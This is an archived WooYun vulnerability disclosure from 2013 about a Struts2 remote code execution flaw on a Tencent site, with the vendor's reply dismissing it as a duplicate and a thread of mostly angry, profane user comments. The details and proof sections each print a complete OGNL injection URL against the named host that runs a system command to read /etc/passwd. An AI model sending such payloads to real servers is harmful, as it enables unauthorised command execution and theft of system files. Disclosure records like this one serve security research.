漏洞概要
关注数(24)
关注此漏洞
漏洞标题:腾讯某站存在struts2远程代码执行漏洞
相关厂商:腾讯
漏洞作者: 小博
提交时间:2013-07-17 16:34
修复时间:2013-07-18 16:03
公开时间:2013-07-18 16:03
漏洞类型:文件上传导致任意代码执行
危害等级:高
自评Rank:10
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情
披露状态:
2013-07-17: 细节已通知厂商并且等待厂商处理中
2013-07-18: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
详细说明:
http://act.sj.qq.com/bless/blog.do?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}
漏洞证明:
http://act.sj.qq.com/bless/blog.do?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}
修复方案:
版权声明:转载请注明来源 小博@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2013-07-18 16:03
厂商回复:
我们在17号上午就已经接到大量报告,获悉到这个情况,因此这里忽略。
依然感谢你的报告。
最新状态:
2013-07-19:各位大牛,不要激动。 腾讯并未高高在上,我们是基于这样的考虑才做出忽略的决定:这个漏洞前后共计10+的人都向我们报告过,我们的处理原则是对所有报告者表示感谢,但只对首发报告者给分。 我们也已经与洞主沟通过,提出忽略的原因,洞主表示“无所谓”。 这里也暴露出了我们在处理时的一些问题,一个是当时重复的漏洞报告特别多(100+),人力有限,我们无法一一答复;二个是wooyun平台上提供的厂商与白帽子沟通渠道并不及时(私信方式,无法保证及时性。各位大牛是否有同感?),本次也是通过QQ及时联系到洞主,建议wooyun提供一键QQ联系的方式。以上问题我们会改进。 非常感谢各位大牛的批评与建议,有任何问题都可以提出。另外,请理智发言,文明上网。
漏洞评价:
评论
-
2013-07-18 16:24 |
xsser 
( 普通白帽子 | Rank:254 漏洞数:17 | 当我又回首一切,这个世界会好吗?)
傻逼腾讯,你受到报告关乌云什么事情, 反正当时是没修复的
-
2013-07-18 16:24 |
xsser ( 普通白帽子 | Rank:254 漏洞数:17 | 当我又回首一切,这个世界会好吗?)
-
2013-07-18 16:28 |
無情 ( 实习白帽子 | Rank:41 漏洞数:5 | 根据相关法律法规和政策,此信息未予显示。)
-
2013-07-18 16:28 |
darksn0w ( 实习白帽子 | Rank:62 漏洞数:10 | 无折腾,不生活!)
-
2013-07-18 16:28 |
M0nster ( 实习白帽子 | Rank:53 漏洞数:17 | 允许我国的艺术家先富起来)
-
2013-07-18 16:28 |
sinck ( 路人 | Rank:20 漏洞数:3 | 1)
-
2013-07-18 16:29 |
小胖子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)
-
2013-07-18 16:29 |
疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)
-
2013-07-18 16:29 |
z7y ( 实习白帽子 | Rank:57 漏洞数:9 | 关注技术与网络安全)
-
2013-07-18 16:29 |
心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 严肃点~此号为虚拟小号,并不存在实体...)
-
2013-07-18 16:29 |
redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)
-
2013-07-18 16:29 |
YangG ( 路人 | Rank:12 漏洞数:2 | 没)
-
2013-07-18 16:30 |
shack2 ( 普通白帽子 | Rank:470 漏洞数:71 | QQ:1341413415 一个热爱编程(Java),热爱网...)
-
2013-07-18 16:31 |
saline ( 普通白帽子 | Rank:231 漏洞数:32 | Focus On Web Secur1ty)
-
2013-07-18 16:32 |
px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)
@xsser 收到没收到谁知道。。当时修没修,大家都知道。。
-
2013-07-18 16:36 |
z@cx ( 普通白帽子 | Rank:434 漏洞数:56 | 。-。-。)
-
2013-07-18 16:40 |
imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )
-
2013-07-18 17:05 |
VIP ( 普通白帽子 | Rank:759 漏洞数:100 )
-
2013-07-18 17:06 |
he1renyagao ( 普通白帽子 | Rank:225 漏洞数:29 | 是金子总会发光,在还未发光之前,先打磨打...)
-
2013-07-18 17:26 |
萧然 ( 路人 | Rank:0 漏洞数:2 | 喜欢一切美丽的东西!)
-
2013-07-18 17:27 |
自在轮回 ( 路人 | Rank:8 漏洞数:3 | .)
-
2013-07-18 17:40 |
asgoo ( 实习白帽子 | Rank:41 漏洞数:5 | 虚心学习)
今天我发现好多人的号被逼下线 包括我的520XX 别搞我号啊。。。
-
2013-07-18 18:08 |
Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)
-
2013-07-18 20:15 |
黑色的屌丝 ( 路人 | Rank:27 漏洞数:5 | →_→→_→)
-
2013-07-18 21:25 |
冷静 ( 路人 | Rank:3 漏洞数:2 )
-
2013-07-18 21:36 |
纠结师 ( 实习白帽子 | Rank:53 漏洞数:12 | 传说中的废材)
去你妈的腾讯 高高在上的样子 有洞子 头抬那么高干叼? 装看不到?
-
2013-07-18 21:46 |
小囧 ( 普通白帽子 | Rank:396 漏洞数:62 | 在通往牛B的路上一路狂奔)
-
2013-07-18 22:09 |
基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)
这种struts2暴发型漏洞真没营养。。建议直接1rank,1个月后公开。。
-
2013-07-18 23:42 |
天行健 ( 路人 | Rank:20 漏洞数:3 | 业余信息安全爱好者,没事了玩一玩)
-
2013-07-19 09:47 |
许仙 ( 路人 | Rank:14 漏洞数:6 | 技术需要时间沉淀)
-
2013-07-19 11:22 |
腾讯(乌云厂商)
各位大牛,不要激动。腾讯并未高高在上,我们是基于这样的考虑才做出忽略的决定:这个漏洞前后共计10+的人都向我们报告过,我们的处理原则是对所有报告者表示感谢,但只对首发报告者给分。我们也已经与洞主沟通过,提出忽略的原因,洞主表示“无所谓”。这里也暴露出了我们在处理时的一些问题,一个是当时重复的漏洞报告特别多(100+),人力有限,我们无法一一答复;二个是wooyun平台上提供的厂商与白帽子沟通渠道并不及时(私信方式,无法保证及时性。各位大牛是否有同感?),本次也是通过QQ及时联系到洞主,建议wooyun提供一键QQ联系的方式。以上问题我们会改进。非常感谢各位大牛的批评与建议,有任何问题都可以提出。另外,请理智发言,文明上网。
-
2013-07-19 11:26 |
VIP ( 普通白帽子 | Rank:759 漏洞数:100 )
-
2013-07-19 11:47 |
萧然 ( 路人 | Rank:0 漏洞数:2 | 喜欢一切美丽的东西!)
-
2013-07-19 12:09 |
px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)
-
2013-07-19 12:09 |
imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )
-
2013-07-19 12:37 |
有妹子送上 ( 实习白帽子 | Rank:89 漏洞数:28 | 杭州最帅的男人)
-
2013-07-19 13:22 |
小胖子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)
-
2013-07-19 14:49 |
霸气帝王攻 ( 路人 | Rank:0 漏洞数:3 | 专注互联网)
傻逼腾讯,你受到报告关乌云什么事情, 反正当时是没修复的
-
2013-07-19 20:58 |
基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)
-
2013-07-19 23:34 |
疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)
-
2013-07-19 23:42 |
xsser ( 普通白帽子 | Rank:254 漏洞数:17 | 当我又回首一切,这个世界会好吗?)
根据相关法律法规,此处发言未予显示玩意,高高在上的
-
2013-07-21 01:36 |
微尘 ( 普通白帽子 | Rank:218 漏洞数:74 )
根据相关法律法规,此处发言未予显示玩意的傻逼玩意,高高在上的
-
2013-07-21 13:45 |
疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)
根据相关法律法规,此处发言未予显示玩意,高高在上的
-
2013-08-03 11:05 |
by:安全者 ( 路人 | Rank:0 漏洞数:1 | 只做安全者,不做入侵者!)
腾讯傻逼,QQ空间可以XSS了大家尽情发挥吧!暂时不透露未过滤处
-
2013-09-21 13:48 |
Sura、Rain ( 路人 | Rank:15 漏洞数:8 | 关注Java WEB安全)
